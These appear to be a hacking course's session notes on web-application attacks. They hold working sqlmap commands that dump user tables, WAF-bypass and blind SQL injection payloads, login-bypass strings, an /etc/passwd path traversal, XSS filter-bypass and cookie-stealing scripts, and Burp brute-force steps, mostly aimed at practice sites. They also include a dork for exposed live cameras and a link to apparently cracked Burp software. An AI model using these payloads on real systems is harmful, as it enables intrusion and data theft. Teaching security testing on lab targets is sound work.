2022= sqlmap --url “http://testphp.vulnweb.com/search.php?test=query”
2023(-u or --url for entering a url having a GET Parameter)
2024
2025= sqlmap --url “http://testphp.vulnweb.com/search.php?test=query” --dbs
2026(--dbs helps in executing the database() query in the vulnerable column which sqlmap founds by itself only.)
2027
2028= sqlmap --url “http://testphp.vulnweb.com/search.php?test=query” --current -user
2029(This will lists out the Current User using the Database)
2030
2031= sqlmap --url “http://testphp.vulnweb.com/search.php?test=query” -D acuart --tables
2032(After getting know the Database Name, we put the name for getting the sqlmap to knows that this is the Database we want to further enumerate. --tables helps us to get to know all of the Table names of that particular Database).
2033
2034= sqlmap --url “http://testphp.vulnweb.com/search.php?test=query” -D acuart -T users --columns
2035(This will further enumerate and tells us the Columns names of our desired table.)
2036
2037= sqlmap --url “http://testphp.vulnweb.com/search.php?test=query” -D acuart -T users -C email,name,pass,phone,uname --dump
2038(Dumping all the necessary Data of the Columns of table User and extracting it.)
2039
2040------------------------------------------------------------------------------------------
2041
2042
2043
2044GOOGLE DORKING
2045================
2046Google dorking, also known as Google hacking, can return information that is difficult to locate through simple search queries. That description includes information that is not intended for public viewing but that has not been adequately protected. Hackers use Google Dorking to extract only the Desired Data what they exactly want.
2047
2048DORKS COMMANDS
2049=================
2050
2051= intitle : This allows a attacker to search for pages with specific text in their HTML = title. So intitle: “login page” will help a hacker to find out the web titled “login page”.
2052= inurl : This allows a hacker to search for pages based on the text contained in the URL eg. “inurl : login.php”.
2053= intext : This operator searches the entire content of a given page for keywords supplied by the attacker.
2054= site : limits the scope of a query to a single website.
2055= cache : This shows the attacker the cached/previous stored version of a website.
2056= filetype : THis helps in differentiating a attacker the filetype/extension of a particular file he/she is searching.
2057= indexof : This will helps in finding out the whole index a website is saving for multile files and is open to surf.
2058
2059= Finding Live Cameras - (inurl = “/view/view.shtml?id-”) the resultant will be having the live cameras of Axis Company.
2060
2061Google Dork Database for Cyber Security Professionals - https://www.exploit-db.com/google-hacking-database/
2062
2063
2064Exploitation Database for Hackers : exploit-db.com (Offensive Security)
2065
2066-----------------------------------------------------------------------------------------
2067
2068TASKS
2069=====
2070
20711. Study of Union Based SQL Injection in depth.
20722. Use SQLMAP on testphp.vulnweb.com with the steps I have showed.
20733. 10 % Codes for Special Characters in URL.
2074------------------------------------------------------------------------------------------
2075
2076
2077
2078 SESSION 12
2079 ==========
2080
2081INTRODUCTION TO FIREWALLS , IDS , IPS
2082======================================
2083
2084FIREWALLS
2085==========
2086A firewall is a component which is used to filter the incoming and outgoing OR the inbound and outbound rules of a particular network. A firewall is having a database of signatures for the data packets moving inside or outside of a Network. The data packets moving in a Network Traffic having a malicious content can be blocked by a firewall according to the rule sets created by a Network Administrator.
2087
2088TYPES OF FIREWALLS
2089===================
20901. Softwares Based Firewalls : These are the firewalls which is in the form of a application or a software which is having a rulesets of Inbound and Outbound Traffic coming from a Network. Eg. Windows Firewalls , LInux Firewalls - IP Tables.
2091
20922. Hardware Based Firewalls : A hardware based firewall is a peripheral which is having a system box with a processor and giving us a Configuration Panel and having more advanced features from a Software Based Firewalls.
2093Eg. Juniper, Sophos, Endian etc.
2094
2095IDS
2096===
2097IDS stands Intrusion DEtection System, it is a software or a hardware based program which detects every suspicious activity and create a log for it. It can also create the logs and send immediately to the Network Administrator so that they can find out that there is a Intruder in our network.
2098It can be determined in different types such as NIDS (Network IDS), HIDS (Host IDS), WIDS(Wireless IDS) etc
2099
2100IPS
2101===
2102IPS stands for Intrusion Prevention System, it acts and works by preventing the intruders which have been doing malicious and illegal activities in the Nretwork or with there clients immediately.
2103
2104EG. of IDS and IPS - SNORT etc.
2105
2106HONEYPOTS
2107=========
2108A honeypot is a attracting and luring technique to fetch and traps a Hacker, Attacker or a victim which can be a WEb Application, a Network System or a Access Point(Wireless Connection) which seems like absolutely normal but is created to trap the Attackers.
2109
2110------------------------------------------------------------------
2111
2112MISCOFIGURED WAF
2113=================
2114
2115INTRDUCTION TO WAF - A web application firewall is just like a network firewall works with the rulesets of inbound and outbound but not for a network, and works for a web application or a web site. A WAF filters the HTTP, HTTPS traffic along with the communication handeling done by TCP/UDP and also works with some advanced mitigation programs like securing OWASP Top 10.
2116
2117
2118FOR EG . MOD SECURITY
2119
2120----------------------------------------------------
2121INSTALLING AND CONFIGURING MOD SECURITY WAF (JUST FOR REFERENCE)
2122================================================================
2123
2124OS - UBUNTU 14.04
2125
2126Mod Security WAF
2127
2128------------------------------------------------------------------------------------------
2129
2130BYPASSING MOD WAF
2131==================
2132
2133
2134Steps :-
2135
2136= Finding GET Method.
2137= Generating SQL Syntax Error by (‘)
2138= To check the number of columns by ORDER BY.
2139= Getting Vulnerable Columns UNION SELECT.
2140= Getting a error in finding out the Vulnerable Columns.
2141
2142
2143Inline Executable Comments -
2144
2145query sanjeev
2146
2147 start - /*!
2148 end - */
2149
2150 with Inline Executable Comments - /*!sanjeev*/
2151
2152Changing the Case Sensitive things
2153
2154 union select > uNiOn SeLECt
2155
2156
2157Inline Executable Comments
2158---------------------------
2159Union - /*!UniOn*/
2160Select - /*!SelECt*/
2161But these will only work if the DB version is less than 6. The version is always be in Decimal Notation, we can write them by removing the period (.) also. Eg. 5.00.00 -> 50000
2162
2163So for finding out that the Inline Comments can work or not, we have to put the Database Version with Union Select like :
2164
2165= php?id=1' /*!50000UniOn*/ /*!50000SelECt*/ 1,2--+
2166
2167= To get the database and version :
2168 /*!50000UniOn*/ /*!50000SelECt*/ database(),version()--+
2169
2170= To get the table name from information_schema :
2171 /*!50000UniOn*/ /*!50000SelECt*/ 1,table_name from /*!50000Information_schame.tables*/--+
2172
2173= To get the column name from users table :
2174 /*!50000UniOn*/ /*!50000SelECt*/ 1,column_name from /*!50000Information_schame.columns*/ where table_name="users"--+
2175
2176= To get the data:
2177 /*!50000UniOn*/ /*!50000SelECt*/ 1,/*!50000Group_concat(User_id,Users,Password)*/ from users--+
2178
2179--------------------
2180
2181BLIND BASED SQL INJECTION
2182==========================
2183
2184Blind Based sql injection is a tyupe of attack vector of sql injection which doesn't gives us any SQL Syntax Error, but can be possibly done.
2185If there is some data in the web qapplication, it will show the data, else it will reload the same page.
2186
2187STEPS
2188=====
21891. Finding the GET Method
21902. Finding the vulnerability by (')
21913. Finding the number of columns in the database by doing ORDER BY in any ID in which we get Data.
21924. Finding the Vulnerable column by Union Select.
21935. Same steps further as Union Based SQL Injection.
2194
2195Demo of Blind Based Boolean
2196============================
2197 1
2198 1'
2199 1' and 1=0 # ---> False
2200 1' and 1=1 # ---> True
2201 1' and 1=0 order by 1 # --> No Result ---> Generic error
2202 1' and 1=1 order by 1 # --> Result --> normal result
2203 1' and 1=0 order by 2 # --> No result
2204 1' and 1=1 order by 2 # ---> Result
2205 1' and 1=0 order by 3 # ---> No Result
2206 1' and 1=1 order by 3 # ---> No Result ---> True ---> there are 2 number of columns
2207 1' and 1=0 union select 1,2 #
2208 1' and 1=1 union select 1,2 #
2209
2210and so on.
2211
2212TASK
2213=====
22141. PoC on Blind Based SQL Injection .
22152. List of 10 WAF.
2216
2217
2218
2219 SESSION 13
2220 ==========
2221
2222TIME BASED SQL INJECTION
2223========================
2224Time Based SQL Injection is the subcategory of Blind Based SQL Injection in which when we input a Query, While explain/analyze doesn’t return the result of the query, it does return metadata about the query. It means how long it takes the query to execute and return back the metadata. They are often use to extracts the data when there no other way to retrieve the data from the database while executing a query in the database which creates a time delay if the query is right depending on the time it takes to get the server response. As you can guess, this type of inference approach is particularly useful for blind injection attacks. It is basically used by using queries which results to delay of response.
2225
2226DEMONSTRATION
2227===============
2228Target - testphp.vulnweb.com
2229
2230Using “sleep()” command which will delay the response for some time.
2231
2232Vulnerable GET Method - http://testphp.vulnweb.com/listproducts.php?cat=2
2233
2234STEPS
2235======
2236 Finding a GET method.
2237Using Sleep query as :
2238
2239= ?cat=2 and (select sleep(10) from dual where database() like '%')--+
2240This will execute the query in 10 seconds if the query is right.
2241
2242
2243% - Vallue Completer
2244eg. Sanjeev
2245 Sanj%
2246
2247
2248This will helps in executing and finding out the Database name or any other details. If there will be a Delay, that means there is a Data exist like query we have put in.
2249For eg.
2250
2251- Finding out the database name using sleep query.
2252
2253http://testphp.vulnweb.com/listproducts.php?cat=2 and (select sleep(10) from dual where database() like "acu%")--+
2254
2255
2256http://testphp.vulnweb.com/listproducts.php?cat=2 and (select sleep(10) from dual where database() like "acuart")--+
2257
2258Same for finding the table names:
2259= http://testphp.vulnweb.com/listproducts.php?cat=2 and (select sleep(10) from information_schema.tables where table_name like "use%")--+
2260
2261Finding Columns Names of our desired Table :
2262= http://testphp.vulnweb.com/listproducts.php?cat=2 and (select sleep(10) column_name from information_schema.columns where table_name=”users” like "%")--+
2263
2264
2265ARBITRARY FILE UPLOAD
2266=====================
2267Arbitrary File - An Arbitrary file is a Malicious Shell File which if Uploaded by a Attacker into a Web Application, will give a full Control to the Server Machine the website is hosted including exploring and doing any operations.
2268Arbitrary File upload is a Situation where we input and upload such Arbitrary Files into the input method of those web application and get the whole access of the Server Machine a website is hosted.
2269
2270Attack Vectors
2271============
2272A attacker can get full control of the Server Machine.
2273After getting access into the server, he/she can Deface and delete all the websites hosted in the Server if it is a Shared Server.
2274
2275Demonstration in DVWA and LVS.
2276
2277------------------------------------------------------------------------------------
2278
2279POST PARAMETER INJECTION
2280==========================
2281POST Parameter Injection is the attack vector when we tamper and manipulate POST Parameters and with HTTP Headers through some tools like Tamper Data, Burp Suite etc.
2282First we have to capture the http packets Parameters moving from a browser to a Web Server.
2283
2284Demonstration on DVWA Arbitrary File Upload on Medium Level on changing extension of the Arbitrary File through Tamper Data.
2285
2286TOOLS
2287-------
2288Tamper Data
2289Burpsuite
2290
2291----------------------------------------------------------------------------------------------------------
2292
2293Application to automate VAPT
2294=============================
2295
2296Acunetix Demonstration. - https://www.acunetix.com/vulnerability-scanner/download/
2297With Installation and Report Generation.
2298
2299CVSS Score - The Common Vulnerability Scoring System (CVSS) is a free and open industry standard for assessing the severity of computer system security vulnerabilities. CVSS attempts to assign severity scores to vulnerabilities, allowing responders to prioritize responses and resources according to threat.
2300Websites:
2301https://nvd.nist.gov/vuln-metrics/cvss
2302
2303CVE - CVE stands for Common Vulnerability and Exposures is a list of information security vulnerabilities and exposures that aims to provide common names for publicly known problems. The goal of CVE is to make it easier to share data across separate vulnerability capabilities (tools, repositories, and services) with this "common enumeration."
2304Websites :
2305https://cve.mitre.org/
2306https://www.cvedetails.com/
2307https://nvd.nist.gov/
2308
2309Exploit-DB - The Exploit Database is the ultimate archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers of Offensive Security.
2310Websites :
2311https://www.exploit-db.com/
2312
2313
2314------------
2315
2316
2317
2318 SESSION 14
2319 ==========
2320
2321INTRODUCTION TO BURP SUITE
2322===========================
2323Burp Suite is a graphical tool for testing Web application security. Burp Scanner can automatically move parameters between different locations, such as URL parameters and cookies for doing Vulnerability Assessment and Penetration Testing of a Web Application.
2324
2325The tool is written in Java and developed by a organization named PortSwigger Security. We also use Burp Suite for Tampering of data moving through one Node to another.
2326There are particularly 2 Versions of Burp Suite :
2327
2328= Professional Version $349.00 per user, per year having all the functions.
2329= Community Edition which is free of cost.
2330
2331Features of Burp Suite :
2332================
2333= Proxy Services : In Burpsuite, everything starts with setting up your browser to Burp’s proxy. It sets up as a Socket in Burp which initiates and tells that where to intercept the data. It lets you tamper the request and response the way you want it. You can change form methods from GET to POST or vice-versa, unhide hidden fields, enable disabled fields etc.
2334
2335= Intruder : A Intruder is like a master spy in Burp Suite which helps in attacking to the Web Application in many ways. Burp Intruder is meant for exploitation and automating attacks. For that Intruder is a very good and efficient request sender and response collector. This is basically used for performing powerful customized attacks to find and exploit unusual vulnerabilities.
2336It is further having Payloads and Attack Modes. Payloads are the data malicious or non-malicious we sent to a web application. Attack Modes define how to send it. Attacks Modes are “Cluster Bomb”, “Sniper” etc.
2337
2338= Scanner : The scanner can interact with your web application and can detect simple security issues like if the password is being submitted in GET method or advanced vulnerabilities. You can set the speed of scanning, pause and resume, choose scan areas and more.
2339
2340= Spider : Spidering or web crawling , is the process of automatically following all the links on a web page to discover both static and dynamic web resources of the web application.
2341
2342= Repeater : Repeater can select a request from Target or other sources and send it to Repeater to further tampering with the request by changing the data being sent, request method, cookie values and many other client side values.
2343
2344BRUTE FORCING USING BURP SUITE
2345===============================
2346
2347Brute Force Attack : Brute forcing is a trial and error method used by application programs to decode encrypted data such as passwords by hit and trial through exhaustive effort by employing intellectual strategies.
2348
2349Let us first understand the flaw through which Brute Forcing is working. Brute Forcing is working because of the flaw of Filtration on Login Forms. If there is not any extra layer of security or any limit to enter the credentials, Brute Forcing can be done.
2350
2351Demonstration on DVWA, LVS and demo.testfire.net .
2352Using Burp Suite Community Edition.
2353
2354STEPS :
2355=======
2356
2357= Opening up the Target’s Web Application, where we want to Brute Force.
2358= Setting Up Proxy Settings in Browser
2359 - Browser Setting > Network Setting > Proxy Configuration > Manual Proxy > Enter a Socket with local host > 127.0.0.1:9500
2360 - Check mark it > Use this proxy server for all protocol
2361 - Clear all details from "No Proxy for".
2362 - Click on Apply.
2363= Opening up Burp Suite
2364= Go to Proxy > Options > Enter Proxy Socket which we entered on the Browser Settings.
2365= Click on Intercept > Intercept is ON (This will start capturing moving packets)
2366= Enter anything on the Login Form, Either Username and Password or both with anything.
2367= Burp Suite will start blinking.
2368= Burp Suite have captured a Packet, Select that Packet from Burp Suite containing credentials > Right Click > Send to Intruder.
2369= Turn Off Intercept Mode.
2370= Go to Intruder > Position > Clear
2371= Select the Parameters you want to start brute forcing on.
2372 - Select value of username < Add
2373 - Select value of password < Add
2374= Select the Attacking Mode
2375= Sniper Mode : If you know either one of Username or Password.
2376= Cluster Bomb Mode : If you don’t know anything about Credentials and you want to Bruteforce on both Username and Password.
2377= Go to Payloads > Setting up a Wordlist in Payloads > Giving a Default list on any random Credentials for Login into DVWA or demo.testfire.net
2378= Select Values for Payloads
2379 Payload : 1 > list of usernames
2380 Payload : 2 > list of passwords
2381= Options > Grep Match > Clear
2382= Username and/or password incorrect. < Add
2383= Click on “Start Attack”
2384= Examine the Length Codes of the Payloads
2385= There must be some common Length Number, Click on every Different one.
2386= Go to Response of that Payload.
2387= Click on Render. (Which will show you the image of Web Application in itself)
2388= Find out the Correct Username and Password and enter.
2389
2390AUTHENTICATION BYPASS USING BURPSUITE
2391======================================
2392
2393When we consider Brute forcing by Burp suite, if a login form is not having any of the password we entered in the Payloads, we can see and examine that if a website is Vulnerable to Authentication Bypass or not.
2394
2395Steps -
2396For Authentication Bypass, we first have to scan the vulnerabilities and check that if Authentication Bypass can happen or not.
2397If Yes, we have to put
2398Username : 1'or'1'='1 Password : 1'or'1'='1
2399Username : admin'or'1'or'1'='1 Password : admin'or'1'or'1'='1
2400Username : x’or’x’=’x Password : x’or’x’=’x
2401
2402-----------------------------------------------------------------------------------------------------------------------------------
2403
2404FILE INCLUSION VULNERABILITY
2405===========================
2406File Inclusion Vulnerability leads a Attacker to access the already included files which are already present on the Web Server and may contain some Critical Data.
2407So by accessing those files through URL, the Attacker can use that critical data which contains the critical data and misuse that.
2408
2409
2410TYPES OF FILE INCLUSION :
2411
2412= LFI - Local File Inclusion (LFI) vulnerabilities allow an attacker to read (and sometimes execute) files on the victim machine. This can be very dangerous because if the web server is misconfigured and running with high privileges, the attacker may gain access to sensitive information.
2413= RFI - Remote File Inclusion (RFI) vulnerabilities are easier to exploit but less common. Instead of accessing a file on the local machine, the attacker is able to execute code on the Remote Web Application Server.
2414
2415Demonstration of LFI on DVWA.
2416
2417STEPS :
2418(../) - Going a Folder Backwards.
2419
2420= http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd
2421 Getting the data in warning and errors by back slashing (../) .
2422
2423------------------------------------------------------------------------------------------------------------------------------------
2424
2425COMMAND EXECUTION VULNERABILITY
2426=================================
2427Command injection/execution is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data to a system shell (CMD). In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application.
2428
2429Demonstration on LVS and DVWA.
2430
2431STEPS - Pinging on the Input Method of the Web Application.
2432
2433------------------------------------------------------------------------------------------------------------------------------------
2434
2435TASK
2436=====
24371. Finding 5 Commands that can work for Command Execution/Injection.
24382. What is passwd file on the Server?
24393. POC of Brute Forcing on DVWA with both Usernames and Passwords using Cluster Bomb. (Should be Short)
2440
2441
2442Authentication Bypass cheatsheet -
2443https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
2444https://tipstrickshack.blogspot.com/2013/01/sql-injection-authentication-bypass.html
2445
2446BurpUnlimited - https://ufile.io/02m9z
2447
2448
2449
2450 SESSION 15
2451 ==========
2452
2453INTRODUCTION TO JAVASCRIPTS
2454============================
2455JavaScript is a programming language commonly used in web development. It was originally developed by Netscape as a means to add dynamic and interactive elements to websites.
2456
2457Java > Javascript
2458
2459Java is a software programming language. But, Javascript is meant for development of Web Applications which is generally used in front end developing.
2460Javascripts is concerned with the behaviour of the webpages depends upon the user inputs. Mainly deployed on the dynamic webpages for the validation purposes.
2461For Example : A simple java script code can create and show Prompt Box or Alert Box etc.
2462
2463Usually Javascript is used with HTML. For using Javascript, We use tags like, <script> etc.
2464
2465They use Tags and functions like :
2466
2467
2468alert(document.cookie)
2469
2470alert()
2471prompt()
2472document.write
2473document.cookie
2474fuctions
2475loops
2476conditions
2477
2478Syntax Of Javascripts
2479======================
2480
2481
2482<script> : </script>
2483
2484<script> = Starting Tag
2485
2486</script> = Ending Tag
2487
2488<script>
2489.
2490.
2491.
2492</script>
2493
2494TAGS :
2495
2496= alert() : This function is used to draw a pop up box known as dialoug box. What ever the body content of the function is written into it it will show it as text on the box.
2497
2498
2499
2500SYNTAX : <script>alert("String Based / Integer Based")</script>
2501
2502eg.
2503<script>alert("Welcome to this site")</script>
2504
2505Syntax : <script>alert()</script>
2506
2507Here we can write two type of data types. First String Based and Integer.
2508
2509<script>alert("Welcome to Site")</script>
2510
2511<script>alert("123")</script>
2512
2513= prompt : It is same as alert but also given a text field to write ur own text. But it will not effect the working of the pop up hence only with read only property.
2514
2515<script>prompt("hi")</script>
2516
2517= Stealing Cookies with Java Script
2518
2519Stealing Sessions via Cookies
2520
2521Function : document.cookie
2522
2523Every website contains a cookie and respective session in browser memory hence if we are able to get the cookie we can embed the same cookie in our browser and as we open the same site will be going to enter into the same session of the victim.
2524
2525<script>alert(document.cookie)</script>
2526
2527----------------------------------------------------------
2528
2529XSS - CROSS SITE SCRIPTING
2530===========================
2531
2532Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts into a Web Application, and the Web Application Responds back according to it. The end user’s browser has no way to know that the script should not be trusted, and will execute the script because it thinks the script came from a trusted source.
2533Its a OWASP TOP 10 3rd vulnerability found mostly in 80% of all dynamic websites.
2534
2535Flaw of XSS
2536============
2537When any website takes any kind of executable input from any unauthorised visitor then we can say that website is vulnerble to xss attack.
2538For Example: While Shopping in Flipkart some user entering <h1>Hacked</h1> in search bar and as he hit search website understand the heading tag and executes it on main page.
2539
2540TYPES OF XSS
2541=============
2542
25431. Stored XSS : Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database. That is it is permanent until the database is reset or the query is manually removed.
25442. Reflected XSS : Reflected attacks are those where the injected script is reflected off the web server, that means it is not storing and just reflecting the query. When the webpage will be refreshed, the XSS query will be gone. One Time Use but extracts data.
25453. DOM Based XSS : Document Object Module Based XSS is a type of cross site scripting attack which relies on inappropriate handling, in the HTML page, of the data from its associated DOM. For eg. in (document.write) etc.
2546
2547DEMONSTRATION on LVS and DVWA
2548=============================
2549
2550STEPS
2551=====
2552
2553= Finding any XSS vulnerable web application, DVWA and LVS.
2554= Reflected XSS (LOW in DVWA, LVS)
2555 = <script>alert("hacked")</script> //this will create a pop up named kartik
2556= Stored XSS (LOW in DVWA, LVS)
2557 = Name : kartik Message : <script>alert("xss vulnerability")</script> // storing in thge Database.
2558
2559= Reflected XSS (MEDIUM in DVWA, LVS)
2560 Here <script>alert("test")</script> will not work. Because the source code has performed validation checks and sanitization.
2561
2562Validation Check / Sanitization says > replace "<script>"
2563
2564= ways to bypass XSS in medium security
2565 1. <script> <script>
2566 2. <script lan=eng>
2567 3. <ScRipt>
2568 4. <scr<script>ipt> ---> <script> --> <scr ipt> --> <script>
2569
2570 = <ScRiPt>alert("test")</script>
2571
2572
2573= Cookie Stealing
2574 To steal the cookie of the website > affecting on (document.cookie)
2575 <ScRiPt>alert(document.cookie)</script>
2576
2577
2578-------------------------------------------------------------------------------------------------------------
2579
2580
2581https://lucideustech.blogspot.in/2018/03/a-definitive-guide-to-session-hijacking.html
2582
2583------------------------------------------------------------------------------------------------------------
2584
2585BROKEN AUTHENTICATION AND SESSION MANAGEMENT
2586=============================================
2587
2588Broken Authentication and Session Management is two different vulnereabilities. Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.
2589Broken Authentication leads to Weak Login Credentials a Web Application authentication check is having, and Session management leads to the exposure of sensitive Session IDs.
2590
2591
2592Demonstration of Broken Authentication and Session Management in LVS.
2593
2594Session Management Example :
2595
2596pnb login > session created > sessiion id = 123545677gcccgz89
2597
2598ATTACKER > steal the session id > behave like a victim and go to pnb site > session id of the attacker, he/she can change it with the viictim's session id ie, session id=12354567789 in the same version of we browser and same enviornment.
2599
2600----------------------------------------------------------------------------------------------------------------------------------------------------------------------
2601
2602FUNCTION on XSS high: onload , onfocus
2603
2604
2605TASK
2606====
26071. hackertest.net
26082. https://xss-game.appspot.com/
26093. DOM Based XSS - 5 queries which will work on web servers.
2610
2611
2612
2613 SESSION 16
2614 ==========
2615
2616CSRF
2617=====
2618CSRF stands for Cross/Client Site Request Forgery. This is a Web Application attack where a attacker forces an end user to execute unwanted actions on a web application in which they're currently authenticated. They creates his/her own malicious links or pages to trigger and lure a victim and further misuse and steal there data for illegal purposes further leads to Identity Theft etc..
2619
2620
2621Eg. already logged in inta a bank site and clicking on a ad on other malicious website stating "click here to win an iphone X" and is malicious.
2622
2623Demonstration on LVS and DVWA.
2624
2625--------------------------------------------------------------------------------------------------------------------------------------------------------------
2626
2627MISSING FUNCTION LEVEL ACCESS CONTROL
2628=====================================
2629
2630Let us first understand what Access Control means.
2631Access Control : access control is a process by which users are granted access and certain privileges to systems, resources or information. This term is usually derives for Authentication Checks.
2632
2633Most of the web applications verify function level access rights before making that functionality accessible to the user. Missing Function Level Access Control is one of the vulnerabilities on OWASP's Top 10 list and occurs when those authentication function checks are insufficient and attackers misuse them.
2634
2635Demonstration on LVS via Unrestricted User Access to the Admin Account.
2636
2637---------------------------------------------------------------------------------------------------------------------------------------------------------------
2638
2639INVALIDATED REDIRECTS AND FORWARDS
2640===================================
2641Most web applications on the internet frequently redirect and forward users to other pages or other external websites.
2642Invallidated/Unvalidated redirects and forwards means redirecting a authenticated and valid user to a phishing or malicious web page which defines a malicious activity created by the attacker as using forwards to access unauthorized pages.
2643
2644How to find the redirecting value?
2645There is a redirect_to="url" value in the Hyperlinks, this will signify that the URL is redirecting us to a particular malicious link.
2646
2647Demonstration on LVS of Manual Redirects and Automatic Redirects.
2648
2649Demo using Burpsuite.
2650
2651------------------------------------------------------------------------------------------------------------------------------------------------------------
2652
2653CWE
2654====
2655Common Weakness Enumeration (CWE) is a universal online dictionary of weaknesses that have been found in computer software.The purpose of CWE is to facilitate the effective use of tools that can identify, find and resolve bugs, vulnerabilities and exposures in computer software before the programs are publicly distributed or sold.
2656
2657Website - https://cwe.mitre.org/
2658
2659---------------------------------------------------------------------------------------------------------------------------------------------------------------
2660
2661Automated VAPT Tool - NETSPARKER
2662================================
2663
2664Netsparker is a web application security scanner, with support for both detection and exploitation of vulnerabilities. It is like Accunetix only, but more advanced and flexible in Report Generation and finding out Vulnerabilities.
2665
2666Demo Application - https://www.netsparker.com/web-vulnerability-scanner/download/
2667
2668Demonmstration of Report Generation and explanation on demo.testfire.net via Netsparker.
2669
2670---------------------------------------------------------------------------------------------------------------------------------------------------------------
2671
2672
2673
2674 SESSION 17
2675 ==========
2676
2677INTRODUCTION TO LINUX BASICS
2678============================
2679
2680Linux word derived and evolved from UNIX.
2681Unix was the first operating system came to existence with CLI environment and mainly used for server side working as per today's requirements. It is the most flexible and customizable OS used by skilled individuals.
2682
2683Advantages of using Linux OS
2684=============================
26851. It was very tough to operate as you need to have some high end skills to operate in this operating system.
2686
26872. Used by Govt Officials Private Organisations hence not much popular for a general user to operate because it is more secure..
2688
2689
2690Unix : Server Side OS
2691File Extension : .tar.gz / .deb and other compressed packages
2692Popular OS : Red Hat, Fedora, CENT OS etc.
2693
2694Linux : Is derived from Unix and to engage more users (simple users) Linux was developed under a open source community began in 1991 and hence is the most popular non commercial os on the planet.
2695
2696File Extension : .tar.gz , .deb etc.
2697Popular OS : Ubuntu Flavours, Linux Mint, Kali OS etc.
2698
2699For Personal/Home Usage : How to Install Kali Linux in VMware.
2700At Work Places : Never Install Kali Linux only use LIVE CD.
2701
2702
2703INTRODUCTION TO PENTESTING OS - KALI
2704=====================================
27051. Virtual Box (Vmware)
27062. Kali Linux (Image download : kali.org)
27073. Run it LIVE
27084. Shutdown
2709
2710= Installation of Kali Linux.
2711
2712-----------------------------------------------------------------------------------------
2713
2714DIRECTORIES ARCHITECTURE IN LINUX
2715==================================
2716
27171. /root : This is known as the home directory for the root user. Every single file path in Linux begins from root in one way or another.
2718
27192. /bin : Binary folder, this is where most of your binary files are stored, typically for the Linux terminal commands and core utilities,
2720
27213. /boot : This is where all the needed files for Linux to boot are kept which helps in loading the operating system.
2722
27234. /dev : This is where your physical devices are mounted, devices are those whenever we insert a Mouse, or any other device via peripheral ports they always go in dev folder.
2724
27255. /etc : Configuration files specific to the machine are stored in the "/etc" folder. Configuration files of each and every thing present in the linux is stated as “.conf , .config”
2726etc. extensions .
2727
27286. /home : It is like the "Users" folder in Windows OS FOR OTHER THAN ROOT USERS. The Desktop, Documents, Downloads, Photos, and Videos folders are all stored under the /home/username directory of every particular user.
2729
27307. /lib : This is where libraries are kept which are having basic utility files of the operations performed in the OS.
2731
27328. /proc : This includes a directory for each running process, including kernel processes, in directories named /proc/PID, where PID is the process number for every processes.
2733
27349. /media : Removable Media Devices Folder. It is a place where external devices such as USB drives can be mounted. it holds and mounts the external devices attached to the devices
2735
273610. /mnt : This is basically a placeholder folder used for mounting other folders or drives. When we want to mount or place any internal drive or folder in the operating system we will use "/mnt" folder.
2737
273811. /usr : Contains files and utilities that are shared between users. This folder is use for sharing data and other stuffs between two different users on the same OS.
2739
2740Basic Commands of Linux
2741=======================
2742
27431. cd: Changes directories.
2744
27452. ls : List directory
2746
27473. man : To get the manual page of any command or tool.
2748
27494. mkdir : To make a directory in linux
2750
27515. cp : Copy a file to another folder
2752
27536. mv : Move a file to another location
2754
27557. rm : To remove a file only.
2756
27578. rmdir : Remove Directory.
2758
27599. grep : To check whether the work is in file or not
2760 man grep
2761 grep sairam kar.txt
2762
276310. cat : To read the contents of the file.
2764
276511. locate : To locate the specific file.
2766
276712. echo : For printing something on the terminal.
2768
276913. date : For viewing the current date and time
2770
277114. cal : For finding the Calender.
2772
277315. uname : Finding out your OS Version.
2774
277516. uname -a : Finding out all the information of the OS. Like User Information, OS Information etc.
2776
277717. init 0 : Shutting down the OS.
2778
277918. reboot : Restarting the OS.
2780
278119. Starting a Python Server : python -m SimpleHTTPServer portnumber
2782
278320. sudo : Sudo allows a system admin to give certain users the ability to run some (or all) commands at the root level and logs all commands and arguments.
2784
278521. ifconfig : Interface configuration and details
2786
278722. iwconfig : Wireless Configuration and details
2788
278923. route -n : Gateway IP Details
2790
279124. apt-get install applicationname : Installation of Application through terminal.
2792
279325. python -m SimpleHTTPServer 4444 : To ceate a simple server in lunux for transferring files.
2794
2795---------------------------------------------------------------------------------------------------
2796
2797WORDLISTS GENERATOR
2798===================
2799
2800CRUNCH
2801======
2802Usage : TERMINAL : crunch minlength maxlength characterset
2803
2804---------------------------------------------------------------------------------------------------
2805
2806
2807Users and Groups
2808=================
2809
28101. Root account : This is also called superuser and would have complete and unfettered control of the system. A superuser can run any commands without any restriction. This user should be assumed as a system administrator.
2811
28122. System accounts : System accounts are those needed for the operation of system-specific components. These accounts are usually needed for some specific function on your system, and any modifications to them could adversely affect the system.
2813
28143. User accounts : User accounts provide interactive access to the system for users and groups of users. General users are typically assigned to these accounts and usually have limited access to critical system files and directories.
2815
2816
2817Understanding Privileges and Permissions
2818========================================
2819
28201. Read - a readable permission allows the contents of the file to be viewed. A read permission on a directory allows you to list the contents of a directory.
28212. Write - a write permission on a file allows you to modify the contents of that file. For a directory, the write permission allows you to edit the contents of a directory.
28223. Execute - for a file, the executable permission allows you to run the file and execute a program or script. For a directory, the execute permission allows you to change to a different directory and make it your current working directory.
2823
2824= Command : "ls -al" - Show Privileges
2825
2826 -rw-r--r-- 1 root root 25 Sep 5 04:23 confidential.txt
2827
2828In this example, the file owner has read and write permissions only.
2829- The first three characters (rw-) define the owner’s permission to the file.
2830- The next three characters (r--) are the permissions for the members of the same group as The file owner (which in this example is read only).
2831- The last three characters (r--) show the permissions for all other users and in this example it is read only.
2832
2833
2834Command "chmod" : chmod changes the permissions of each given file according to mode, where mode describes the permissions to modify.
2835
2836Syntax : "chmod 754 filename"
2837
2838 4 stands for "read",
2839 2 stands for "write",
2840 1 stands for "execute",
2841and 0 stands for "no permission."
2842
2843Here,
28447 is the combination of permissions 4+2+1 (read, write, and execute)
28455 is 4+0+1 (read, no write, and execute)
2846and 4 is 4+0+0 (read, no write, and no execute)
2847
